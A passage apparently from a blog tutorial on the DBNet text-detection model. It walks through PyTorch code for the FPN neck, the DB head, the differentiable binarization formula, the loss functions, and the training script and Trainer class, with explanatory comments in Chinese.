        p4 = F.interpolate(p4, size=(h, w))
        p5 = F.interpolate(p5, size=(h, w))
        return torch.cat([p2, p3, p4, p5], dim=1)
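A quick shape check, as a sketch of my own: it assumes ConvBnRelu is importable from models.basic and ResNet-50-style stage widths [256, 512, 1024, 2048].

import torch

# Probe the FPN with random feature maps at the usual 1/4 .. 1/32 scales of a 640x640 input.
fpn = FPN(in_channels=[256, 512, 1024, 2048], inner_channels=256)
c2 = torch.randn(1, 256, 160, 160)
c3 = torch.randn(1, 512, 80, 80)
c4 = torch.randn(1, 1024, 40, 40)
c5 = torch.randn(1, 2048, 20, 20)
out = fpn((c2, c3, c4, c5))
print(out.shape)  # torch.Size([1, 256, 160, 160]): all levels fused at the c2 resolution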
• ConvHead
  • ConvHead is a very basic and common module: a 1x1 convolution followed by a Sigmoid activation applied to the input feature map. It is mainly used to produce the final output map, especially in tasks where the feature map must be converted into a probability map.
import torch
from torch import nn


class ConvHead(nn.Module):
    def __init__(self, in_channels, out_channels, **kwargs):
        super().__init__()
        self.conv = nn.Sequential(
            # A 1x1 convolution: a linear transform over the channel dimension that
            # leaves the spatial dimensions (height and width) unchanged.
            nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
            # Sigmoid squashes the output into (0, 1); useful when the output should be a
            # probability map, e.g. for binary classification or normalized feature maps.
            nn.Sigmoid()
        )

    def forward(self, x):
        return self.conv(x)
      • DBHead
import torch
from torch import nn


class DBHead(nn.Module):
    def __init__(self, in_channels, out_channels, k=50):
        super().__init__()
        self.k = k  # Steepness parameter of the step function used in the forward pass.
        self.binarize = nn.Sequential(  # Sequential module that produces the probability (shrink) map.
            nn.Conv2d(in_channels, in_channels // 4, 3, padding=1),  # 3x3 conv reducing channels to in_channels // 4.
            nn.BatchNorm2d(in_channels // 4),  # Batch normalization.
            nn.ReLU(inplace=True),  # Non-linear activation.
            nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2),  # Upsample: doubles the spatial dimensions.
            nn.BatchNorm2d(in_channels // 4),
            nn.ReLU(inplace=True),
            nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
            nn.Sigmoid())  # Output values in (0, 1), suitable for a probability map.
        self.binarize.apply(self.weights_init)

        self.thresh = self._init_thresh(in_channels)  # Build the threshold-map branch via _init_thresh.
        self.thresh.apply(self.weights_init)

    def forward(self, x):
        shrink_maps = self.binarize(x)  # Output of the binarize branch.
        threshold_maps = self.thresh(x)  # Output of the thresh branch.
        if self.training:  # In training mode,
            binary_maps = self.step_function(shrink_maps, threshold_maps)  # compute the binary map with step_function
            y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1)  # and concatenate all three maps.
        else:
            y = torch.cat((shrink_maps, threshold_maps), dim=1)
        return y

    def weights_init(self, m):
        # He initialization (kaiming_normal_) for conv weights; fixed values for batch-norm layers.
        classname = m.__class__.__name__
        if classname.find('Conv') != -1:
            nn.init.kaiming_normal_(m.weight.data)
        elif classname.find('BatchNorm') != -1:
            m.weight.data.fill_(1.)
            m.bias.data.fill_(1e-4)

    def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
        # Build the sequential module that produces the threshold map:
        # convolution, batch norm, ReLU, upsampling and a final Sigmoid.
        in_channels = inner_channels
        if serial:
            in_channels += 1
        self.thresh = nn.Sequential(
            nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
            nn.BatchNorm2d(inner_channels // 4),
            nn.ReLU(inplace=True),
            self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
            nn.Sigmoid())
        return self.thresh

    def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
        # Upsampling module: nearest-neighbour interpolation plus convolution, or a transposed convolution.
        if smooth:  # Smooth upsampling.
            inter_out_channels = out_channels
            if out_channels == 1:
                inter_out_channels = in_channels
            module_list = [
                nn.Upsample(scale_factor=2, mode='nearest'),  # Double the spatial size with nearest-neighbour upsampling,
                nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)]  # then refine with a conv layer.
            if out_channels == 1:
                # If out_channels is 1, append an extra conv layer to adjust the output channel count.
                module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
            return nn.Sequential(*module_list)
        else:
            # Otherwise use a transposed convolution to expand the spatial dimensions directly.
            return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

    def step_function(self, x, y):
        # The differentiable binarization step function: a sigmoid-like curve over the difference
        # between x (probability map) and y (threshold map), producing values in (0, 1).
        return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
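A small shape sanity check of my own, assuming a 256-channel neck output like the FPN above:

import torch

head = DBHead(in_channels=256, out_channels=2, k=50)
feat = torch.randn(1, 256, 160, 160)
head.train()
print(head(feat).shape)  # torch.Size([1, 3, 640, 640]): shrink, threshold and binary maps
head.eval()
print(head(feat).shape)  # torch.Size([1, 2, 640, 640]): shrink and threshold maps only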
1. The input image is fed into the feature-pyramid backbone.

def step_function(self, x, y):
    # This step_function is exactly the differentiable binarization formula.
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
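A quick numeric check, as a small aside of my own: plugging a few values into this function shows how k sharpens it toward a hard step.

import math

def db(x, k):
    # The DB function 1 / (1 + exp(-k * x)) from step_function above, with x = P - T.
    return 1.0 / (1.0 + math.exp(-k * x))

for x in (-0.1, -0.01, 0.01, 0.1):
    print(f"x={x:+.2f}  k=1: {db(x, 1):.3f}  k=50: {db(x, 50):.3f}")
# With k=50 the output saturates toward 0 or 1 even for small |x|, approximating a step at x = 0.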


The larger k is in DB, the closer the function gets to standard binarization.

Why DB improves performance can be explained through gradient backpropagation. Take the binary cross-entropy loss as an example and define $f(x)=\frac{1}{1+e^{-kx}}$ as our DB function, where $x=P_{i,j}-T_{i,j}$. The loss $l_{+}$ for positive labels and the loss $l_{-}$ for negative labels are then:

$$l_{+}=-\log\frac{1}{1+e^{-kx}},\qquad l_{-}=-\log\left(1-\frac{1}{1+e^{-kx}}\right)$$
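Differentiating these (the expressions below match the DBNet paper) gives:

$$\frac{\partial l_{+}}{\partial x}=-k f(x)\,e^{-kx},\qquad \frac{\partial l_{-}}{\partial x}=k f(x)$$

The gradients are scaled up by the amplifying factor $k$, and the amplification is strongest in incorrectly predicted regions ($x<0$ for positive labels, $x>0$ for negative ones), which pushes the network to separate the probability map from the threshold map cleanly.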

Optimization

$\alpha$ and $\beta$ are set to 1.0 and 10, respectively.

Binary cross-entropy (BCE) loss is applied to both $L_s$ and $L_b$:

$$L_s=L_b=\sum_{i\in S_l}y_i\log x_i+(1-y_i)\log(1-x_i)$$

class BalanceCrossEntropyLoss(nn.Module):
    # A balanced variant of cross-entropy loss for class-imbalanced data: positive and
    # negative samples are weighted differently so training copes better with the imbalance.
    '''
    Balanced cross entropy loss.
    Shape:
        - Input: :math:`(N, 1, H, W)`
        - GT: :math:`(N, 1, H, W)`, same shape as the input
        - Mask: :math:`(N, H, W)`, same spatial shape as the input
        - Output: scalar.

    Examples::

        >>> m = nn.Sigmoid()
        >>> loss = nn.BCELoss()
        >>> input = torch.randn(3, requires_grad=True)
        >>> target = torch.empty(3).random_(2)
        >>> output = loss(m(input), target)
        >>> output.backward()
    '''

    def __init__(self, negative_ratio=3.0, eps=1e-6):
        # negative_ratio: ratio of negative to positive samples, 3.0 by default.
        # eps: a small constant (1e-6) to avoid division by zero.
        super(BalanceCrossEntropyLoss, self).__init__()
        self.negative_ratio = negative_ratio
        self.eps = eps

    def forward(self,
                pred: torch.Tensor,  # pred: network prediction of shape (N, 1, H, W).
                gt: torch.Tensor,  # gt: target of the same shape as pred.
                mask: torch.Tensor,  # mask: shape (N, H, W), indicating positive regions.
                return_origin=False):
        '''
        Args:
            pred: shape :math:`(N, 1, H, W)`, the prediction of network
            gt: shape :math:`(N, 1, H, W)`, the target
            mask: shape :math:`(N, H, W)`, the mask indicates positive regions
        '''
        # Count positive and negative samples, capping the negatives at negative_ratio times the positives.
        positive = (gt * mask).byte()
        negative = ((1 - gt) * mask).byte()
        positive_count = int(positive.float().sum())
        negative_count = min(int(negative.float().sum()), int(positive_count * self.negative_ratio))
        # Per-pixel binary cross-entropy loss.
        loss = nn.functional.binary_cross_entropy(pred, gt, reduction='none')
        positive_loss = loss * positive.float()
        negative_loss = loss * negative.float()
        # negative_loss, _ = torch.topk(negative_loss.view(-1).contiguous(), negative_count)
        # Keep only the hardest negative_count negative losses (hard negative mining).
        negative_loss, _ = negative_loss.view(-1).topk(negative_count)

        # Compute the final weighted loss.
        balance_loss = (positive_loss.sum() + negative_loss.sum()) / (positive_count + negative_count + self.eps)

        if return_origin:
            return balance_loss, loss
        return balance_loss
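A minimal synthetic call of my own, matching the (N, H, W) shapes that DBLoss passes in below (the tensors here are random, not from the data pipeline):

import torch
from torch import nn

criterion = BalanceCrossEntropyLoss(negative_ratio=3.0)
pred = torch.rand(2, 32, 32)                 # sigmoid-activated probabilities
gt = (torch.rand(2, 32, 32) > 0.9).float()   # sparse positive labels
mask = torch.ones(2, 32, 32)                 # every pixel participates
print(criterion(pred, gt, mask))             # a scalar balanced loss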

$L_t$ is computed as the sum of $L_1$ distances between the prediction and the labels inside the dilated text polygon $G_d$:

$$L_t=\sum_{i\in R_d}|y_i^*-x_i^*|$$

class MaskL1Loss(nn.Module):
    # An L1-loss variant with a mask: the loss is computed only over the region of interest.
    def __init__(self, eps=1e-6):
        super(MaskL1Loss, self).__init__()
        self.eps = eps

    def forward(self, pred: torch.Tensor, gt, mask):
        # Absolute difference between prediction and ground truth, averaged over the masked region.
        loss = (torch.abs(pred - gt) * mask).sum() / (mask.sum() + self.eps)
        return loss

At inference time, either the probability map or the approximate binary map can be used to generate the text bounding boxes; both produce almost identical results. The detected shrunk polygon is dilated back with offset

$$D'=\frac{A'\times r'}{L'}$$

where $A'$ is the area of the shrunk polygon, $L'$ is its perimeter, and $r'$ is empirically set to 1.5.
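In DBNet-style post-processing this dilation is commonly implemented with shapely and pyclipper; a sketch under that assumption (unclip is a hypothetical helper name, and box is a list of integer pixel vertices):

import pyclipper
from shapely.geometry import Polygon

def unclip(box, unclip_ratio=1.5):
    # Compute D' = A' * r' / L' from the shrunk polygon, then offset the polygon outward by D'.
    poly = Polygon(box)
    distance = poly.area * unclip_ratio / poly.length
    offset = pyclipper.PyclipperOffset()
    offset.AddPath(box, pyclipper.JT_ROUND, pyclipper.ET_CLOSEDPOLYGON)
    return offset.Execute(distance)  # a list of expanded polygon(s)

print(unclip([(0, 0), (100, 0), (100, 20), (0, 20)]))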

      DB_loss.py

from torch import nn

from models.losses.basic_loss import BalanceCrossEntropyLoss, MaskL1Loss, DiceLoss


class DBLoss(nn.Module):
    def __init__(self, alpha=1.0, beta=10, ohem_ratio=3, reduction='mean', eps=1e-6):
        """
        Implement PSE Loss.
        :param alpha: coefficient of the binary_map loss
        :param beta: coefficient of the threshold_map loss
        :param ohem_ratio: ratio used for OHEM
        :param reduction: 'mean' or 'sum', how the loss is reduced over the batch
        """
        super().__init__()
        assert reduction in ['mean', 'sum'], " reduction must in ['mean','sum']"
        # alpha and beta weight the individual loss terms.
        self.alpha = alpha
        self.beta = beta
        self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
        self.dice_loss = DiceLoss(eps=eps)
        self.l1_loss = MaskL1Loss(eps=eps)
        self.ohem_ratio = ohem_ratio  # Ratio for OHEM (online hard example mining).
        self.reduction = reduction  # How the loss is reduced (mean or sum).

    def forward(self, pred, batch):
        shrink_maps = pred[:, 0, :, :]
        threshold_maps = pred[:, 1, :, :]
        binary_maps = pred[:, 2, :, :]

        # Balanced cross-entropy (OHEM) loss on the shrink maps.
        loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask'])
        # Masked L1 loss on the threshold maps.
        loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask'])
        metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps)
        # If pred has more than two channels, also compute the Dice loss on the binary maps.
        if pred.size()[1] > 2:
            loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
            metrics['loss_binary_maps'] = loss_binary_maps
            # Combine the weighted loss terms into the total loss (loss_all).
            loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps
            metrics['loss'] = loss_all  # Return a dict with every loss term plus the total.
        else:
            metrics['loss'] = loss_shrink_maps
        return metrics
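A synthetic sketch of the call convention (mine, not the post's; it assumes the repo's DiceLoss and friends are importable), showing how DBLoss consumes the 3-channel training output of DBHead:

import torch

criterion = DBLoss(alpha=1.0, beta=10, ohem_ratio=3)
pred = torch.rand(2, 3, 160, 160)  # shrink, threshold and binary maps from DBHead in train mode
batch = {
    'shrink_map': (torch.rand(2, 160, 160) > 0.9).float(),
    'shrink_mask': torch.ones(2, 160, 160),
    'threshold_map': torch.rand(2, 160, 160),
    'threshold_mask': torch.ones(2, 160, 160),
}
metrics = criterion(pred, batch)
print(metrics['loss'])  # alpha * L_s + beta * L_t + L_b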

      Experiments

The training entry script:

from __future__ import print_function

import argparse
import os

import anyconfig


def init_args():
    parser = argparse.ArgumentParser(description='DBNet.pytorch')
    parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
    parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

    args = parser.parse_args()
    return args


def main(config):
    # Import the required modules: model building, losses, data loaders, the trainer,
    # post-processing and evaluation metrics.
    import torch
    from models import build_model, build_loss
    from data_loader import get_dataloader
    from trainer import Trainer
    from post_processing import get_post_processing
    from utils import get_metric
    # If more than one GPU is available, initialize the distributed training environment.
    if torch.cuda.device_count() > 1:
        torch.cuda.set_device(args.local_rank)
        torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
        config['distributed'] = True
    else:
        config['distributed'] = False
    config['local_rank'] = args.local_rank

    # Build the training and validation data loaders from the config.
    train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
    assert train_loader is not None
    if 'validate' in config['dataset']:
        validate_loader = get_dataloader(config['dataset']['validate'], False)
    else:
        validate_loader = None

    # Build the loss function and move it to the GPU.
    criterion = build_loss(config['loss']).cuda()

    # Configure the model's input channel count (3 for color images, 1 for grayscale).
    config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
    model = build_model(config['arch'])

    # Build the post-processing function and the evaluation metric.
    post_p = get_post_processing(config['post_processing'])
    metric = get_metric(config['metric'])

    # Create the Trainer and start training.
    trainer = Trainer(config=config,
                      model=model,
                      criterion=criterion,
                      train_loader=train_loader,
                      post_process=post_p,
                      metric_cls=metric,
                      validate_loader=validate_loader)
    trainer.train()


if __name__ == '__main__':
    # Fix up the module path so the current and grandparent directories are importable.
    import sys
    import pathlib
    __dir__ = pathlib.Path(os.path.abspath(__file__))
    sys.path.append(str(__dir__))
    sys.path.append(str(__dir__.parent.parent))
    # project = 'DBNet.pytorch'  # project root directory
    # sys.path.append(os.getcwd().split(project)[0] + project)

    # Read the config file with anyconfig and resolve any base configs it inherits from.
    from utils import parse_config

    args = init_args()
    assert os.path.exists(args.config_file)
    config = anyconfig.load(open(args.config_file, 'rb'))
    if 'base' in config:
        config = parse_config(config)
    # Call main to start training.
    main(config)

The Trainer class:

import time

import torch
import torchvision.utils as vutils
from tqdm import tqdm

from base import BaseTrainer
from utils import WarmupPolyLR, runningScore, cal_text_score


class Trainer(BaseTrainer):
    # __init__ takes the config, model, criterion, the train/validate data loaders,
    # the metric class (metric_cls) and an optional post-processing function (post_process).
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
        super(Trainer, self).__init__(config, model, criterion)
        # Read the image-logging interval (show_images_iter) from the config and store the loaders.
        # If a validation loader is given, a post-processor and metric class must be given too.
        self.show_images_iter = self.config['trainer']['show_images_iter']
        self.train_loader = train_loader
        if validate_loader is not None:
            assert post_process is not None and metric_cls is not None
        self.validate_loader = validate_loader
        self.post_process = post_process
        self.metric_cls = metric_cls
        self.train_loader_len = len(train_loader)
        # Learning-rate scheduler: WarmupPolyLR supports warmup followed by polynomial decay.
        if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
            warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
            if self.start_epoch > 1:
                self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
            self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
                                          warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
        # Log the sample and batch counts of the train and validation datasets.
        if self.validate_loader is not None:
            self.logger_info(
                'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
                    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
        else:
            self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # _train_epoch trains the model for one epoch.
    def _train_epoch(self, epoch):
        self.model.train()  # Put the model into training mode.
        # Record the epoch and batch start times.
        epoch_start = time.time()
        batch_start = time.time()
        train_loss = 0.
        running_metric_text = runningScore(2)
        # Initialize the cumulative loss and running metrics, and read the current learning rate.
        lr = self.optimizer.param_groups[0]['lr']

        # Iterate over every batch in the training loader.
        for i, batch in enumerate(self.train_loader):
            if i >= self.train_loader_len:
                break
            self.global_step += 1
            lr = self.optimizer.param_groups[0]['lr']

            # Move the batch tensors to the GPU.
            for key, value in batch.items():
                if value is not None:
                    if isinstance(value, torch.Tensor):
                        batch[key] = value.to(self.device)
            cur_batch_size = batch['img'].size()[0]

            # Run the model to get the predictions.
            preds = self.model(batch['img'])
            # Compute the losses, then backpropagate and step the optimizer.
            loss_dict = self.criterion(preds, batch)
            # backward
            self.optimizer.zero_grad()
            loss_dict['loss'].backward()
            self.optimizer.step()
            # Step the learning-rate scheduler if WarmupPolyLR is in use.
            if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
                self.scheduler.step()
            # acc iou
            # Compute the accuracy / IoU metrics on the shrink map.
            score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
                                              thred=self.config['post_processing']['args']['thresh'])

            # Format the losses into loss_str and accumulate the total training loss.
            loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
            for idx, (key, value) in enumerate(loss_dict.items()):
                loss_dict[key] = value.item()
                if key == 'loss':
                    continue
                loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
                if idx < len(loss_dict) - 1:
                    loss_str += ', '

            train_loss += loss_dict['loss']
            acc = score_shrink_map['Mean Acc']
            iou_shrink_map = score_shrink_map['Mean IoU']

            # Every log_iter steps, log throughput (samples/sec), accuracy, IoU, loss and learning rate.
            if self.global_step % self.log_iter == 0:
                batch_time = time.time() - batch_start
                self.logger_info(
                    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
                        epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
                        iou_shrink_map, loss_str, lr, batch_time))
                batch_start = time.time()

            # If TensorBoard is enabled (main process only), write the losses and metrics for visualization.
            if self.tensorboard_enable and self.config['local_rank'] == 0:
                # write tensorboard
                for key, value in loss_dict.items():
                    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
                self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
                self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
                # Every show_images_iter steps, log the input images, ground truth and predictions
                # to TensorBoard, laid out as image grids via vutils.make_grid.
                if self.global_step % self.show_images_iter == 0:
                    # show images on tensorboard
                    self.inverse_normalize(batch['img'])
                    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
                    # shrink_labels and threshold_labels
                    shrink_labels = batch['shrink_map']
                    threshold_labels = batch['threshold_map']
                    shrink_labels[shrink_labels <= 0.5] = 0
                    shrink_labels[shrink_labels > 0.5] = 1
                    show_label = torch.cat([shrink_labels, threshold_labels])
                    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
                    # model output
                    show_pred = []
                    for kk in range(preds.shape[1]):
                        show_pred.append(preds[:, kk, :, :])
                    show_pred = torch.cat(show_pred)
                    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
                    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
        # Return the epoch's average training loss, learning rate, total time and epoch number.
        return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
                'epoch': epoch}

    def _eval(self, epoch):
        # Evaluation mode disables dropout and switches batch normalization to inference behaviour.
        self.model.eval()
        # torch.cuda.empty_cache()  # speed up evaluating after training finished
        # raw_metrics collects per-batch metrics; total_frame and total_time track throughput.
        raw_metrics = []
        total_frame = 0.0
        total_time = 0.0
        for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
            # Disable gradient computation to save memory and speed up inference.
            with torch.no_grad():
                # Move the batch tensors to the GPU.
                for key, value in batch.items():
                    if value is not None:
                        if isinstance(value, torch.Tensor):
                            batch[key] = value.to(self.device)
                # Record the start time and run the model.
                start = time.time()
                preds = self.model(batch['img'])
                # Post-process the predictions into boxes and scores.
                boxes, scores = self.post_process(batch, preds, is_output_polygon=self.metric_cls.is_output_polygon)
                # Update the throughput statistics.
                total_frame += batch['img'].size()[0]
                total_time += time.time() - start
                # Compute and store this batch's evaluation metrics.
                raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
                raw_metrics.append(raw_metric)
        # Aggregate the per-batch metrics.
        metrics = self.metric_cls.gather_measure(raw_metrics)
        # Log frames per second (FPS).
        self.logger_info('FPS:{}'.format(total_frame / total_time))
        # Return recall, precision and F-measure.
        return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
        # Runs at the end of every training epoch.
        # Log this epoch's training stats.
        self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
            self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
            self.epoch_result['lr']))
        # Paths for the latest and best checkpoints.
        net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
        net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

        # Only the main process saves checkpoints.
        if self.config['local_rank'] == 0:
            # Save the latest checkpoint.
            self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
            save_best = False
            if self.validate_loader is not None and self.metric_cls is not None:  # use F1 as the best-model criterion
                # Evaluate the model when a validation set and metric class are available.
                recall, precision, hmean = self._eval(self.epoch_result['epoch'])

                # Log the evaluation metrics to TensorBoard if enabled.
                if self.tensorboard_enable:
                    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
                    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
                    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
                self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

                # Decide whether this is the best model by F1 score.
                if hmean >= self.metrics['hmean']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['hmean'] = hmean
                    self.metrics['precision'] = precision
                    self.metrics['recall'] = recall
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            else:
                # Without a validation set, fall back to the training loss.
                if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
                    save_best = True
                    self.metrics['train_loss'] = self.epoch_result['train_loss']
                    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
            # Log the current best metrics and copy the checkpoint if it is the best so far.
            best_str = 'current best, '
            for k, v in self.metrics.items():
                best_str += '{}: {:.6f}, '.format(k, v)
            self.logger_info(best_str)
            if save_best:
                import shutil
                shutil.copy(net_save_path, net_save_path_best)
                self.logger_info("Saving current best: {}".format(net_save_path_best))
            else:
                self.logger_info("Saving checkpoint: {}".format(net_save_path))

    def _on_train_finish(self):
        # Runs when training completes: log every tracked metric and a completion message.
        for k, v in self.metrics.items():
            self.logger_info('{}:{}'.format(k, v))
        self.logger_info('finish train')
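For intuition about the WarmupPolyLR schedule referenced above, here is a standalone sketch of the usual warmup-then-polynomial-decay shape (my own formulation under stated assumptions, not the repo's exact code; the power and warmup_factor values are assumed defaults):

def warmup_poly_lr(step, base_lr, max_iters, warmup_iters, power=0.9, warmup_factor=1.0 / 3):
    # Linear warmup from warmup_factor * base_lr up to base_lr, then polynomial decay to 0.
    if step < warmup_iters:
        alpha = step / warmup_iters
        return base_lr * (warmup_factor * (1 - alpha) + alpha)
    return base_lr * (1 - (step - warmup_iters) / (max_iters - warmup_iters)) ** power

for s in (0, 50, 100, 5000, 9999):
    print(s, round(warmup_poly_lr(s, 0.007, 10000, 100), 6))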
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      from __future__ import print_function

      import argparse
      import os

      import anyconfig


      def init_args():
      parser = argparse.ArgumentParser(description='DBNet.pytorch')
      parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
      parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

      args = parser.parse_args()
      return args


      def main(config):
      # 导入必要的模块,包括模型构建、损失函数、数据加载器、训练器、后处理和评估指标。
      import torch
      from models import build_model, build_loss
      from data_loader import get_dataloader
      from trainer import Trainer
      from post_processing import get_post_processing
      from utils import get_metric
      # 检查是否有多个 GPU,如果有,则初始化分布式训练环境。
      if torch.cuda.device_count() > 1:
      torch.cuda.set_device(args.local_rank)
      torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
      config['distributed'] = True
      else:
      config['distributed'] = False
      config['local_rank'] = args.local_rank

      # 根据配置文件加载训练和验证数据加载器。
      train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
      assert train_loader is not None
      if 'validate' in config['dataset']:
      validate_loader = get_dataloader(config['dataset']['validate'], False)
      else:
      validate_loader = None

      # 构建损失函数并将其移动到 GPU。
      criterion = build_loss(config['loss']).cuda()

      # 配置模型的输入通道数(彩色图像为 3 通道,灰度图像为 1 通道)。
      config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
      model = build_model(config['arch'])

      # 构建模型、后处理函数和评估指标。
      post_p = get_post_processing(config['post_processing'])
      metric = get_metric(config['metric'])

      # 创建 Trainer 对象并开始训练。
      trainer = Trainer(config=config,
      model=model,
      criterion=criterion,
      train_loader=train_loader,
      post_process=post_p,
      metric_cls=metric,
      validate_loader=validate_loader)
      trainer.train()


      if __name__ == '__main__':
      # 处理模块路径,确保当前目录和上级目录在 Python 路径中。
      import sys
      import pathlib
      __dir__ = pathlib.Path(os.path.abspath(__file__))
      sys.path.append(str(__dir__))
      sys.path.append(str(__dir__.parent.parent))
      # project = 'DBNet.pytorch' # 工作项目根目录
      # sys.path.append(os.getcwd().split(project)[0] + project)

      # 使用 anyconfig 读取配置文件,并解析基础配置。
      from utils import parse_config

      args = init_args()
      assert os.path.exists(args.config_file)
      config = anyconfig.load(open(args.config_file, 'rb'))
      if 'base' in config:
      config = parse_config(config)
      # 调用 main 函数开始模型训练。
      main(config)
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      76
      77
      78
      79
      80
      81
      82
      83
      84
      85
      86
      87
      88
      89
      90
      91
      92
      93
      94
      95
      96
      97
      98
      99
      100
      101
      102
      103
      104
      105
      106
      107
      108
      109
      110
      111
      112
      113
      114
      115
      116
      117
      118
      119
      120
      121
      122
      123
      124
      125
      126
      127
      128
      129
      130
      131
      132
      133
      134
      135
      136
      137
      138
      139
      140
      141
      142
      143
      144
      145
      146
      147
      148
      149
      150
      151
      152
      153
      154
      155
      156
      157
      158
      159
      160
      161
      162
      163
      164
      165
      166
      167
      168
      169
      170
      171
      172
      173
      174
      175
      176
      177
      178
      179
      180
      181
      182
      183
      184
      185
      186
      187
      188
      189
      190
      191
      192
      193
      194
      195
      196
      197
      198
      199
      200
      201
      202
      203
      204
      205
      206
      207
      208
      209
      210
      211
      212
      213
      214
      215
      216
      217
      218
      219
      220
      221
      222
      223
      224
      225
